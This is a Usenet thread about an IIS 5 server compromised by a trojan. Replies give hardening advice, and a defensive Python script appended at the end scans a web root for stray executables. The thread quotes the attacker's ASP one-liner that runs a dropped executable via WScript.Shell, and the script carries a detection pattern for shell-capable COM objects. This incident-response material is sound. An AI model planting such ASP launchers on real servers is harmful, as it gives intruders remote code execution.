Re: IIS 5 Compromisation

From: Jeff Cochran (jeff.nospam_at_zina.com)
Date: 04/08/05


Date: Fri, 08 Apr 2005 19:43:29 GMT

On Thu, 7 Apr 2005 11:36:15 +1000, "Saturday Night Paulsy"
<pkorosi@redpepper.com.au> wrote:

>ha ha - nice one Jeff,
>
>I might be dumb but I aint that stupit. I admit I am no security
>specialist - I'm a programmer. I thought someone here
>might be able to shed some light, judging by the responses to the questions
>in this group, some of which quite frankly
>don't even belong in this group.
>
>As for your suggestions, administrator only ftp access, 13 character strong
>password - it would even take YOU a
>century to work it out.

A 13 character string, assuming you didn't use high-ASCII characters
since they're awfully hard to type in a password, is about 22 minutes
to crack. Less if I can use an exploit to get the SAM database on an
unpatched system. Is FTP set to lock out the user after x number of
failed attempts?

>All database submissions/requests are filtered
>against SQL injection attacks using regex. I simply
>can't see any way in via that side.

It's the ways you can't see that come back to bite you. Are you using
a standard port for SQL? Is *every* query parameterized and using
stored procedures?

>Anyways - it turns out its the Win32.IRCFlood trojan, and appears to be
>fairly new as the only patch available to deal with it
>is dated yesterday.

The Win32.IRCFlood!Trojan is several years old, and the major AV
vendors have detected it for quite a while. This may be a newer
variant, but even those should be detected. The older version used
IRC ports for control, which would normally be blocked by a firewall
on a system that didn't have IRC clients/servers running.

The major problem you have now though is that this trojan allows
control of the system through a backdoor it installs. You may have
found and removed the trojan, but do you know what other changes have
been made to the system? Possibly none, but you don't have the
logging in place to do the forensics to be sure.

The advice still stands. Flatten the box and reinstall.

>And, as my MSCE friend has just told me (after some
>research), firewalls won't necessarily stop it from getting on
>the box - only stop the gigs of *** from getting put on.
>
>For anyone that might be interested, it was probably downloaded by someone
>doing "legit" work on the box by browsing. That's what
>the msce told me, anyways - and he's a good deal brighter than your average
>minesweeper certified solitaire expert.

The trojan in question is normally delivered via an executable, which
when run installs the trojan and opens the backdoors. I haven't seen
any newer attack vectors for it, but then I haven't looked either. A
new variant may have a new vector. Or something else you haven't
detected may be on the box as well.

>Finally, thanks for your help. Next time I reckon I'll just fart 'cause
>it'll save all this typing time. I could've been drinking coffee instead.

Next time, go ahead and fart *and* save the typing time. But install
and correctly configure a firewall. Configure auditing. Install and
use the latest version of your AV software. Security isn't a singular
event, it's an ongoing process. Fortunately, you can still drink your
coffee while monitoring it.

Jeff

>"Jeff Cochran" <jeff.nospam@zina.com> wrote in message
>news:42616af5.1154390806@msnews.microsoft.com...
>> On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
>> <pkorosi@redpepper.com.au> wrote:
>>
>> >Hi all,
>> >
>> >my company has several servers acting as web servers hosted at an ISP and
>> >one of them was compromised by some warez bunnies.
>> >All the servers have the latest patches and anti virus software running,
>but
>> >no firewall...
>> >
>> >Several files appeared in a folder off one of the webs, being
>> >
>> >kill.exe
>> >shellconfig.ocx
>> >shellsuccesslog.ocx
>> >win.asp
>> >start.asp
>> >shellhost32.exe
>> >
>> >
>> >win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
>> >start.asp reads as follows
>> >
>> ><%
>> >CreateObject("WScript.Shell").Run("shellhost32.exe")
>> >%>
>> ><h1>Yes, you made it!! Good job dude!<\h1>
>> >
>> >
>> >My question is, has anyone encountered this and how do they get the files
>> >there. Two questions, really.
>>
>> To find out how they got there, check your audit logs and firewall
>> logs. Oh yeah, you already figured out that they got there because
>> you weren't secured and had no firewall. Likely you weren't auditing
>> either. Possibly hadn't turned off anonymous file upload in FTP.
>> Possibly your host got hacked. Possibly a SQL attack. Possibly using
>> "password" as a password wasn't that smart. Too many possiblys for
>> anyone to tell you for sure.
>>
>> >Any help would be greatly appreciated, as they uploaded a significant
>amount
>> >of german dvd's and other garbage onto the server at our expense.
>>
>> Bummer. Flatten the box, reinstall from scratch, patch, secure and
>> get that firewall installed. Live and learn.
>>
>> Jeff
>
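The thread's own evidence (stray .exe/.ocx files in a web folder and a start.asp that calls CreateObject("WScript.Shell").Run(...)) is exactly what a quick web-root triage should surface before the box is flattened. The script below is an added example, not code from either poster; it builds a constructed web root modelled on the listing above and goes a little beyond the post by also flagging the other shell-capable COM ProgIDs commonly abused from ASP.

```python
import re
import tempfile
from pathlib import Path

# Server-side script types worth reading, and binary types that have no
# business sitting in a web content folder.
SCRIPT_EXTS = {".asp", ".asa", ".inc"}
BINARY_EXTS = {".exe", ".ocx", ".dll", ".com", ".bat"}

# COM ProgIDs that hand an ASP page command execution or raw file access.
SHELL_OBJECT = re.compile(
    r"CreateObject\s*\(\s*[\"'](WScript\.Shell|Shell\.Application|"
    r"Scripting\.FileSystemObject|ADODB\.Stream)[\"']\s*\)",
    re.IGNORECASE,
)

def triage(web_root):
    """Return sorted (relative_path, reason) findings under web_root."""
    web_root = Path(web_root)
    findings = []
    for path in web_root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(web_root).as_posix()
        ext = path.suffix.lower()
        if ext in BINARY_EXTS:
            findings.append((rel, "executable in web content folder"))
        elif ext in SCRIPT_EXTS:
            m = SHELL_OBJECT.search(path.read_text(errors="replace"))
            if m:
                findings.append((rel, "instantiates " + m.group(1)))
    return sorted(findings)

def demo():
    """Constructed web root modelled on the listing in the post."""
    root = Path(tempfile.mkdtemp())
    pub = root / "pub"
    pub.mkdir()
    (pub / "start.asp").write_text(          # body quoted in the thread
        '<%\nCreateObject("WScript.Shell").Run("shellhost32.exe")\n%>\n'
        "<h1>Yes, you made it!! Good job dude!<\\h1>\n")
    (pub / "shellhost32.exe").write_bytes(b"MZ")   # constructed stub, not malware
    (pub / "shellconfig.ocx").write_bytes(b"")
    (root / "default.asp").write_text("<% Response.Write(Now()) %>\n")  # benign
    return triage(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(rel, "-", reason)
```

Point triage() at a copy of the real web root taken from the compromised host; anything it lists is a starting point for the audit-log review, not proof of how the files arrived.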